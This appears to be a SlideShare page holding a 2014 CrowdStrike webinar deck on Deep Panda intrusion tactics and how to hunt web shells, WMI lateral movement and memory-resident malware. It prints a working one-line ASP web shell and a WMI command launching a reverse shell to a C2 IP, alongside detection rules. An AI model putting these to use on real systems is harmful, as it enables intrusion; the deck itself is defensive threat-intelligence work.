SlideShare ist ein Scribd-Unternehmen logo

CrowdCasts Monthly: Going Beyond the Indicator

CrowdStrike
CrowdStrike

Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/

TechnologieBusiness
1 von 48
Downloaden Sie, um offline zu lesen
Going Beyond the Indicator
Agenda • Introductions • Typical Attacker TTPs • Case Studies • New Tactics Explained • Hunting and Detecting • Best Practice Preparations • Resources / Q & A © 2014 CrowdStrike, Inc. All rights reserved. 2 @CROWDSTRIKE | #CROWDCASTS
Today’s Speakers Stroz Friedberg, AT&T, The Aerospace Corporation, CERT/CC Incident Response, Forensic Analysis, and Risk Assessments DANNY LUNGSTROM © 2014 CrowdStrike, Inc. All rights reserved. 3 PRIOR TO CROWDSTRIKE 8+ YEARS @CROWDSTRIKE | #CROWDCASTS LinkedIn: Danny Lungstrom CONNECT
Today’s Speakers KPMG LLP. (Information Protection and Business Resiliency) Performing Security Assessments, Auditing and Remediating Environments, and Developing Security Programs/Strategies JUSTIN J. WEISSERT © 2014 CrowdStrike, Inc. All rights reserved. 4 PRIOR TO CROWDSTRIKE CONNECT 7+ YEARS @CROWDSTRIKE | #CROWDCASTS LinkedIn: Justin Weissert Twitter: @JJWeissert
Today’s Speakers RSA NetWitness, Mandiant, Beckman Coulter LinkedIn: Ryan Jafarkhani Twitter: @rj_jafar Auditing, Conducting Incident Response Investigations, Network Forensics, Computer Forensics and Malware Analysis © 2014 CrowdStrike, Inc. All rights reserved. 5 PRIOR TO CROWDSTRIKE CONNECT 5+ YEARS @CROWDSTRIKE | #CROWDCASTS RYAN JAFARKHANI
6 WHO IS ? CrowdStrike is a global provider of security technologies and services focused on identifying advanced threats and targeted attacks. Using big-data technologies, CrowdStrike’s next-generation threat protection platform enables enterprises to identify unknown malware, detect zero-day threats, pinpoint advanced adversaries, and provide attribution. © 2014 CrowdStrike, Inc. All rights reserved.
7 WHAT DO WE DO? TECHNOLOGY ENDPOINT THREAT DETECTION & RESPONSE CONTINUOUS ENDPOINT ACTIVITY MONITORING & REAL-TIME FORENSICS SERVICES PROACTIVE & INCIDENT RESPONSE SERVICES INTELLIGENCE CYBER THREAT INTELLIGENCE & ATTRIBUTION © 2014 CrowdStrike, Inc. All rights reserved.
About CrowdStrike Services Incident Response Investigations Proactive Threat Assessments IR Program Development Average of Ten Years IR Industry Experience Backgrounds in IR Consulting, Government, and Defense Specialists in Broad Range of Technologies Finance, Technology, Manufacturing, Retail, Healthcare, Telecommunications, Oil & Gas, Entertainment © 2014 CrowdStrike, Inc. All rights reserved. 8 COMPREHENSIVE OFFERINGS INDUSTRY VETERANS VARIETY OF CUSTOMER VERTICALS @CROWDSTRIKE | #CROWDCASTS WHO ADVERSARY WHY INTENT WHAT MALWARE INDUSTRY
And there are a lot of adversaries © 2014 CrowdStrike, Inc. All rights reserved. 9 Adversary groups our Intelligence team tracks… Commercial, Government, Non-profit Financial, Technology, Communications Defense & Aerospace, Industrial Engineering, NGOs Financial Sector Dissident groups Electronics & Communications G20, NGOs, Dissident Groups CHINA IRAN Energy Companies INDIA Government, Legal, Financial, Media, Telecom RUSSIA Oil and Gas Companies Financial Sector Crime Syndicates @CROWDSTRIKE | #CROWDCASTS
10 TYPICAL ATTACKER TTPS 2014 Crowdstrike, Inc. All rights reserved.
Typical - Attacker TTPs • Initial Attack Vector • Malware – Persistence Mechanism – Command & Control – Functionality • Lateral Movement • Data Extraction/Theft 2014 CrowdStrike, Inc. All rights reserved. 11
Shift in Attacker TTPs 2014 CrowdStrike, Inc. All rights reserved. 12 Attacker TTP Historical Trends Current Trends Initial Attack Vector Spearphish and Vulnerable External Facing Applications (Most Common) No Significant Change Malware – Persistence Mechanism Installed as Service, Run Key, Etc. No Persistence Malware – Command & Control Beacon to Malicious IP or Domain No Standard Beacon Activity Malware – Functionality Simple – Provides Shell or Basic Upload/Download Functionality Robust – Includes All Required Functionality and Commands Malware – Location Written to Disk Memory-Resident
Shift in Attacker TTPs (Cont.) 2014 CrowdStrike, Inc. All rights reserved. 13 Attacker TTP Historical Trends Current Trends Lateral Movement Net Use, RDP or Utilities (e.g. PSExec) WMI, Service Accounts Obfuscation Timestomp Standard Times (Windows API) Timestomp Both Standard and File Times (Windows API and MFT) Data Extraction Compress Data and Send to Compromised Host Provider No Significant Change Last Hop Communication Source Country IPs (Most Often Chinese, Russian, Iranian) North American IPs, Anonymous VPN Solutions, Cloud
Catalyst for Change 2014 CrowdStrike, Inc. All rights reserved. 14 • Shifts in Tactics – Increased Intel Sharing •  Whitepapers •  Blog Posts •  Conference Demos •  VirusTotal •  US Government JIB (Joint Indicator Bulletin) Pros Cons •  Increased awareness / detection for public companies •  Decreased Intel gap for smaller organizations •  Increased costs for attackers to change TTPs •  Indicators become less effective as attackers shift TTPs (e.g. new malware, C2 infrastructure) •  Attacks become more advanced to avoid current methods of detection •  Reduces visibility into what attacker is doing and/ or targeting
15 CASE STUDIES 2014 Crowdstrike, Inc. All rights reserved.
Case Studies - Background • Company #1 – Company compromised in 2012 using historical TTPs – Partial Remediation February 2013 – Re-Compromise March 2013 with new TTPs • Company #2 – Compromised March 2013 – New TTPs from Company 1 re-compromise were observed © 2014 CrowdStrike, Inc. All rights reserved. 16
Timeline © 2014 CrowdStrike, Inc. All rights reserved. 17 @CROWDSTRIKE | #CROWDCASTS February 2013 March 2013 April 2013 Company #1 Investigation Commences Traditional Tactics Intel Community Shares TTPs Shared Widely Company #1 Partial Remediation Logging & Monitoring Old Tactics Company #2 Investigation Commences New Tactics Company #1 Re-compromised New Tactics
18 NEW TACTICS EXPLAINED 2014 Crowdstrike, Inc. All rights reserved.
Deep Panda – Simple Web Shell • 28 byte web shell •  Active Server Page file –  Expected input is VBScript code (encoded as ASCII hex) •  The execute() function executes any VBScript passed to it –  Upload / download files –  Execute arbitrary commands (including WMI) –  Full access to file system •  Controlled by an attacker “thick client” 2014 Crowdstrike, Inc. All rights reserved. 19 <%execute request(chr(42))%>
Deep Panda – Simple Web Shell 2014 Crowdstrike, Inc. All rights reserved. 20 As a simple example of an encoded command, the following GET request would cause the backdoor to execute the code Response.Write(“<h1>Hello World</h1>”) and would render “Hello World” to be printed in the web browser:  http://<webserver>/showimage.asp?*=%52%65%73%70%6F%6E%73%65%2E%57%72%6 9%74%65%28%22%3C%68%31%3E%48%65%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31 %3E%22%29
Deep Panda – Complex Web Shell © 2014 CrowdStrike, Inc. All rights reserved. 21 •  Ability to impersonate a user (with valid credentials) •  Eight different commands –  File system, SQL server, and Active Directory requests –  Upload / download files –  Compile and execute any C# code
Web Shell Authentication • Rudimentary (but effective) authentication for incoming connections – Requires the presence of a cookie named ‘zWiz’ – or HTTP header Keep-Alive = 320 – or language header containing es- DN (invalid language) • Prevents identification via search engine indexing or vulnerability scanning 2014 Crowdstrike, Inc. All rights reserved. 22
Web Shells – But Why? •  Primary foothold back into victim organization •  Less reliant on malware installed on systems, beaconing to a C2 © 2014 CrowdStrike, Inc. All rights reserved. 23 • Why? –  Low to virtually no detection by antivirus products –  The absence of command and control beacon traffic –  Impossible to block known malicious IP addresses to a web server since adversary can easily change their source IP address –  Cookie and HTTP header authentication aware web shells avoid being enumerated by search engines and restrict access, further reducing their network footprint
Second Stage Malware © 2014 CrowdStrike, Inc. All rights reserved. 24 C2 Infrastructure - Execution using Web Shell -  Lateral Movement -  Data theft Upload MalwareAccess Web Shell Adversary Web ServerAnonymous VPN or Proxy Why? No Command and Control Beacon activity Change IP/Domain on the fly Runs in memory Limits forensic artifacts
Lateral Movement © 2014 CrowdStrike, Inc. All rights reserved. 25 Web Server System32cmd.exe - c:bad.exe /f wmi /s Host2 /u Host2Administrator /p ”P@ssW0rd" /m call /q "Win32_Process" /c Create – CommandLine:C:bad.exe /f sh /s 59.111.22.222 /p 443" Host 2 C2 Infrastructure 59.111.22.222 Anonymous VPN or Proxy Adversary Access Web Shell Leverage WMI Custom VB script “PsExec” Utility 4kb script to remotely launch process as a specified user Cscript.exe – Username Password Remote Host Process path Why WMI? Evades most typical logging Shows up as WMI Service Powerful functionality, built into Windows
26 HUNTING AND DETECTING 2014 Crowdstrike, Inc. All rights reserved.
Go Beyond the Indicator • New evil requires new approaches for detection • Look through multiple haystacks for a single needle – The evil stands out with the right methodology • Blog series – Mo’ Shells Mo’ Problems © 2014 CrowdStrike, Inc. All rights reserved. 27 http://www.crowdstrike.com/blog/
Hunting – WMI Activity © 2014 CrowdStrike, Inc. All rights reserved. 28 • Windows XP and Server 2003 Had Limited Logging – %systemroot%system32wbemlogs • Windows 7 and Server 2008 Do NOT Log – Help investigators help you – enable ahead of time! •  Wevtutil.exe  sl  Microsoft-­‐Windows-­‐WMI-­‐Activity/Trace  /e:true   – Review WMITracing.log via Event Viewer • Be Familiar with Your Environment’s Use of WMI
Hunting Web Shells – Identifying Intrusion Points • Web shells are often one of the earliest stages of malware • Search for activity on the system near the first known compromise time – Successful web scans in logs – SQL injection – Dropper malware – Lateral movement from other compromised systems – Pages created or modified within the webserver document root 2014 Crowdstrike, Inc. All rights reserved. 29 2013-08-25 13:03:53 GET item-details.aspx id=1%27%20or%201=@@version-- - 80 - <redacted IP>
Hunting Web Shells – File Stacking • File stacking is based on the concept of least frequency of occurrence • Collect files from all of your webservers and investigate outliers – What files do not exist on other web servers? – PHP|JSP|ASP|ASPX|CFM © 2014 CrowdStrike, Inc. All rights reserved. 30
Hunting Web Shells – Web Log Review • Perform statistical analysis of page requests and search for outliers – See exactly when the web shells were in use via the web logs 2014 Crowdstrike, Inc. All rights reserved. 31
Hunting Web Shells – Network Monitoring • Stack Web Requests from Network Data • Leverage Cyber Intelligence Feeds to Detect Known Web Shells – Unique header attributes – HTML used to produce the shell © 2014 CrowdStrike, Inc. All rights reserved. 32 alert  tcp  $EXTERNAL_NET  any  -­‐>  $WEB_SERVERS   $HTTP_PORTS  (msg:  "CrowdStrike  Deep  Panda   CSharp  Webshell  Headers";  content:  "Keep-­‐ Alive:  320";  http_raw_header;  content:  "es-­‐ DN";  http_raw_header;  flow:  established,   to_server;  classtype:  trojan-­‐activity;   metadata:  service  http;  sid:  xxx;  rev:  xxx;  )  
Hunting – Memory Resident Malware © 2014 CrowdStrike, Inc. All rights reserved. 33 • “Fileless” Forensics Fun • Persistence, We Don’t Need No Stinkin’ Persistence • New Approach to Malware Means New Approach to Forensics • Hidden, Not Invisible • What’s Normal and What’s New? – Get to know your systems – Image memory, review, rinse and repeat
Hunting with YARA • YARA signatures can be used to search your enterprise for specific patterns on disk and in memory 2014 Crowdstrike, Inc. All rights reserved. 34 rule CrowdStrike_13091_01 : deep_panda alice RAT { meta: description = "Detection of Mad Hatter .NET RAT" last_modified = "2013-10-08" version = "1.1" in_the_wild = true copyright = "CrowdStrike, Inc" report = "CSIT-13091" strings: $marker1 = "alice'srabbithole" wide $marker2 = "{{"Version":{0},"HostName":"{1}","osVersion": "{2}","tm": "{3}","tz":{4}}}" wide $marker3 = "InstManager.pdb" $marker4 = "<osVersion>" $marker5 = "<tm>" $marker6 = "<tz>" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of ($marker*) }
CrowdResponse • Free CrowdStrike Community Tool • Collect and Analyze Artifacts Across Your Enterprise • Available Modules – DirList – YARA – PSList • Many Modules Coming Soon © 2014 CrowdStrike, Inc. All rights reserved. 35 http://www.crowdstrike.com/community-tools/
36 BEST PRACTICE PREPARATIONS 2014 Crowdstrike, Inc. All rights reserved.
Best Practices • Proactive Defense of Your Network – Isolate Critical Assets with Network Segmentation – Consolidate and Monitor Internet Egress Points – Implement Centralized Logging – Patch, Patch, and Patch Again – Secure Web Applications and Internal Software Projects – Minimize or Remove Local Admin Privileges – Implement a Tiered Active Directory Admin Model – Incorporate Cyber Intelligence Feeds 2014 Crowdstrike, Inc. All rights reserved. 37
CrowdStrike Can Help! • Services to Consider – Tabletop Assessments (Yearly at Least) •  Keep your team primed and educated on latest attack vectors – Next-Gen Penetration Testing •  More than just a cursory glance, take a real-world scenario approach – Incident Response, Disaster Recovery and Business Continuity Plans •  CrowdStrike knowledge and experience can help you improve/build plans – Incident Response Services Retainer •  Avoid paperwork related time delays • CrowdStrike Intelligence Subscription – Stay Up To Date with Latest Attacker TTPs 2014 CrowdStrike, Inc. All rights reserved. 38
39 CROWDSTRIKE RESOURCES 2014 Crowdstrike, Inc. All rights reserved.
CrowdStrike Global Threat Report • Adversary activity analysis and predictions • Look back at 2013 • Predictive trends for 2014 • Threat actor profiles and TTPs • Get it on crowdstrike.com © 2014 CrowdStrike, Inc. All rights reserved. 40
INCIDENT RESPONSE SERVICES PROACTIVE RESPONSE SERVICES CROWDSTRIKE SERVICES PROACTIVE RESPONSE SERVICES INCIDENT RESPONSE SERVICES CrowdStrike Services INTELLIGENCETECHNOLOGY 2014 Crowdstrike, Inc. All rights reserved. 41
2014 Crowdstrike, Inc. All rights reserved. 42 PROACTIVE RESPONSE SERVICES PROACTIVE RESPONSE SERVICES Counter Threat Assessment IR Program Development Next-Gen Pen Testing Tabletop Assessment InfoSec Capability Maturing Model Adversary Assessments INCIDENT RESPONSE SERVICES Computer Forensic Analysis Litigation Support Expert Witness Testimony Remediation Malware Analysis
Government-quality intelligence developed using an ‘all-source model’ Detailed technical and strategic analysis of 50+ adversaries’ capabilities, indicators and tradecraft, attribution and intentions Customizable feeds and API for indicators of compromise Indicators can be integrated into current firewall, IDS/IPS, or SIEM solutions to provide real-time attribution Tailored Intelligence feature provides visibility into breaking events that matter an organization’s brand, infrastructure, and customers Falcon Intelligence: Threat Intelligence Subscription 2 3 4 1 5 2014 Crowdstrike, Inc. All rights reserved. 43
Falcon Host: Endpoint Threat Detection & Response Identifies unknown malware & detects zero-day threats Captures and correlates system events to identify adversary activity in real-time Maximum visibility across the full kill chain allows for insight into past & current attacks Context-based detection does not rely on signatures or easily changed IOCs Intelligence integration provides full attribution to identify context, motivation, and actor behind an attack 2 3 4 1 5 2014 Crowdstrike, Inc. All rights reserved. 44
Falcon Host: Continuous Endpoint Activity Monitoring Explore rich execution data collected by the Falcon Host sensors Dashboards provide an at-a-glance view of recent activity for investigative purposes Expert-designed menu of queries provide the ability to proactively hunt for malicious activity 2 3 1 2014 Crowdstrike, Inc. All rights reserved. 45
© 2014 CrowdStrike, Inc. All rights reserved. 46 Q & A
NEXT © 2014 CrowdStrike, Inc. All rights reserved. 47 @CROWDSTRIKE | #CROWDCASTS Topic: Operationalizing Intelligence Adam Meyers – Director, Intelligence Elia Zaitsev – Senior Sales Engineer April 29th | 2PM ET/11AM PT Q&A
CrowdCasts Monthly: Going Beyond the Indicator

Empfohlen

CrowdCasts Monthly: When Pandas Attack
CrowdCasts Monthly: When Pandas AttackCrowdCasts Monthly: When Pandas Attack
CrowdCasts Monthly: When Pandas AttackCrowdStrike
 
CrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdStrike
 
Bear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence OperationsBear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence OperationsCrowdStrike
 
CrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdStrike
 
You Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionYou Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionCrowdStrike
 
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORMDEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORMCrowdStrike
 
Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns CrowdStrike
 
Cloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCrowdStrike
 

Empfohlen

CrowdCasts Monthly: When Pandas Attack
CrowdCasts Monthly: When Pandas AttackCrowdCasts Monthly: When Pandas Attack
CrowdCasts Monthly: When Pandas AttackCrowdStrike
 
CrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdCasts Monthly: You Have an Adversary Problem
CrowdCasts Monthly: You Have an Adversary ProblemCrowdStrike
 
Bear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence OperationsBear Hunting: History and Attribution of Russian Intelligence Operations
Bear Hunting: History and Attribution of Russian Intelligence OperationsCrowdStrike
 
CrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdCast Monthly: Operationalizing Intelligence
CrowdCast Monthly: Operationalizing IntelligenceCrowdStrike
 
You Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionYou Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionCrowdStrike
 
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORMDEFENDING AGAINST THREATS TARGETING THE MAC PLATFORM
DEFENDING AGAINST THREATS TARGETING THE MAC PLATFORMCrowdStrike
 
Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns Cyber Security Extortion: Defending Against Digital Shakedowns
Cyber Security Extortion: Defending Against Digital Shakedowns CrowdStrike
 
Cloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCloud-Enabled: The Future of Endpoint Security
Cloud-Enabled: The Future of Endpoint SecurityCrowdStrike
 
Hacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsHacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsCrowdStrike
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeCrowdStrike
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemCrowdStrike
 
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike
 
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdStrike
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeAdam Barrera
 
CrowdStrike Webinar: Taking Dwell-Time Out of Incident Response
CrowdStrike Webinar: Taking Dwell-Time Out of Incident ResponseCrowdStrike Webinar: Taking Dwell-Time Out of Incident Response
CrowdStrike Webinar: Taking Dwell-Time Out of Incident ResponseBrendon Macaraeg
 
In search of unique behaviour
In search of unique behaviourIn search of unique behaviour
In search of unique behaviourDefCamp
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingCrowdStrike
 
Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning CrowdStrike
 
Evolving Cybersecurity Threats
Evolving Cybersecurity Threats Evolving Cybersecurity Threats
Evolving Cybersecurity Threats Nevada County Tech Connection
 
State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetCrowdStrike
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...CODE BLUE
 
Cyberextortion
CyberextortionCyberextortion
CyberextortionSalim Al Talie
 
DevTalks 2021 Cloud Engineering @Crowdstrike
DevTalks 2021 Cloud Engineering @CrowdstrikeDevTalks 2021 Cloud Engineering @Crowdstrike
DevTalks 2021 Cloud Engineering @CrowdstrikeCosmin Bratu
 
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using DeceptionNTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using DeceptionNorth Texas Chapter of the ISSA
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't EnoughNTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't EnoughNorth Texas Chapter of the ISSA
 
NTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic FailuresNTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic FailuresNorth Texas Chapter of the ISSA
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziNCCOMMS
 
BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophistication
BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophisticationBSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophistication
BSides San Diego 2017 - Sophisticuffs: The rumble over adversary sophisticationPaül Jaramillo
 
Be Social. Use CrowdRE.
Be Social. Use CrowdRE.Be Social. Use CrowdRE.
Be Social. Use CrowdRE.CrowdStrike
 

Weitere ähnliche Inhalte

Was ist angesagt?

Hacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsHacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsCrowdStrike
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeCrowdStrike
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemCrowdStrike
 
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike
 
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdStrike
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeAdam Barrera
 
CrowdStrike Webinar: Taking Dwell-Time Out of Incident Response
CrowdStrike Webinar: Taking Dwell-Time Out of Incident ResponseCrowdStrike Webinar: Taking Dwell-Time Out of Incident Response
CrowdStrike Webinar: Taking Dwell-Time Out of Incident ResponseBrendon Macaraeg
 
In search of unique behaviour
In search of unique behaviourIn search of unique behaviour
In search of unique behaviourDefCamp
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingCrowdStrike
 
Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning Battling Unknown Malware with Machine Learning
Battling Unknown Malware with Machine Learning CrowdStrike
 
State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetCrowdStrike
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...CODE BLUE
 
DevTalks 2021 Cloud Engineering @Crowdstrike
DevTalks 2021 Cloud Engineering @CrowdstrikeDevTalks 2021 Cloud Engineering @Crowdstrike
DevTalks 2021 Cloud Engineering @CrowdstrikeCosmin Bratu
 
NTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using DeceptionNTXISSACSC4 - Detecting and Catching the Bad Guys Using Deception
NTXISSACSC4 - Detecting and Catching the Bad Guys Using DeceptionNorth Texas Chapter of the ISSA
 
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A...MITRE - ATT&CKcon
 
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't EnoughNTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't EnoughNorth Texas Chapter of the ISSA
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziNCCOMMS
 

Was ist angesagt? (20)

Hacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted ThreatsHacking Exposed Live: Mobile Targeted Threats
Hacking Exposed Live: Mobile Targeted Threats
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
 
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
 
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
CrowdStrike CrowdCast: Is Ransomware Morphing Beyond The Ability Of Standard ...
 
CrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the HashCrowdCasts Monthly: Mitigating Pass the Hash
CrowdCasts Monthly: Mitigating Pass the Hash
 
How to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrikeHow to Replace Your Legacy Antivirus Solution with CrowdStrike
How to Replace Your Legacy Antivirus Solution with CrowdStrike
 
CrowdStrike Webinar: Taking Dwell-Time Out of Incident Response
CrowdStrike Webinar: Taking Dwell-Time Out of Incident ResponseCrowdStrike Webinar: Taking Dwell-Time Out of Incident Response
CrowdStrike Webinar: Taking Dwell-Time Out of Incident Response
 
In search of unique behaviour
In search of unique behaviourIn search of unique behaviour
In search of unique behaviour
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond AlertingProactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
 
